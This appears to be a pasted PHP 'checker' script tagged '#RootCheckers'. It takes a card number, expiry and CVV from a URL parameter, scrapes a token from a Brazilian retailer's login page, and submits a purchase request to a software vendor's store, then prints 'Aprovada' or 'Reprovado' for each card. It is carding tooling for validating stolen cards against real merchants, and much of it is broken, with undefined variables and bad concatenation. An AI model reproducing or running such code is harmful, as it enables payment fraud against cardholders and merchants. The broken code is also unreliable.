· 6 years ago · Dec 09, 2019, 02:34 AM
1
2<?php
3set_time_limit(0);
4error_reporting(0);
5
6
7class cURL {
8 var $callback = false;
9 function setCallback($func_name) {
10 $this->callback = $func_name;
11 }
12 function doRequest($method, $url, $vars) {
13 $ch = curl_init();
14 curl_setopt($ch, CURLOPT_URL, $url);
15 curl_setopt($ch, CURLOPT_HEADER, 0);
16 curl_setopt($ch, CURLOPT_NOBODY, 0);
17 curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
18 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
19 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
20 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
21 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
22 curl_setopt($ch, CURLOPT_TIMEOUT, 200);
23 curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
24 curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
25 curl_setopt($ch, CURLOPT_VERBOSE, 1);
26 if ($method == 'POST') {
27 curl_setopt($ch, CURLOPT_POST, 1);
28 curl_setopt($ch, CURLOPT_POSTFIELDS, $vars);
29 }
30 $data = curl_exec($ch);
31 // echo $data;
32 curl_close($ch);
33
34 if ($data) {
35 if ($this->callback) {
36 $callback = $this->callback;
37 $this->callback = false;
38 return call_user_func($callback, $data);
39 } else {
40 return $data;
41 }
42 } else {
43 return curl_error($ch);
44 }
45 }
46 function get($url) {
47 return $this->doRequest('GET', $url, 'NULL');
48 }
49 function post($url, $vars) {
50 return $this->doRequest('POST', $url, $vars);
51 }
52}
53
54function GetStr($string,$start,$end){
55 $str = explode($start, $string);
56 $str = explode($end, $str[1]);
57 return $str[0];
58}
59
60
61$linha = $_GET["linha"];
62$cc = explode("|", $linha)[0];
63$mes = explode("|", $linha)[1];
64$ano = explode("|", $linha)[2];
65$cvv = explode("|", $linha)[3];
66
67
68$email = $cc + "@gmail.com";
69
70
71$nc = new cURL();
72$getoken = $nc->get('https://www.netshoes.com.br/login');
73$token = GetStr($getoken,'type="hidden" value="','" /><div');
74
75
76$a = new cURL();
77 echo $b = $a->post('https://www.bandicam.com/store/buynow_avangate_submit.php', 'PP_PDCODE=BDCAM&PP_BUYEREMAIL1='.$email.'&PP_COUNT=1&PP_CURRENCY=USD&PP_DCURRENCY=USD&PP_COUNTRYCODE=&PP_URL_SUCCESS=https%3A%2F%2Fwww.bandicam.com%2Fbuy%2Fcomplete.php%3Fea%3D'.$email.'&PP_URL_FAIL=https%3A%2F%2Fwww.bandicam.com%2Fbuy%2F');
78
79 $getscurl = new cURL();
80 echo $getss = $getscurl->get('https://www.bandicam.com/buy/complete.php?ea=emailaqui@gmail.com', '');
81if (file_exists(getcwd().'/cookie.txt')) {
82 unlink(getcwd().'/cookie.txt');
83 }
84 $saldo = GetStr($getss, '');
85
86
87
88
89 if (strpos($b, 'Cartão NCard')) {
90
91 echo "#Aprovada $email|$senha | Saldo: $saldo | Valor utilizado: $sla | Numero do Pedido: $exp | #RootCheckers";
92
93
94
95 }else{
96
97 echo "#Reprovado $email|$senha | Token: $token #RootCheckers";
98
99
100}
101
102
103
104
105?>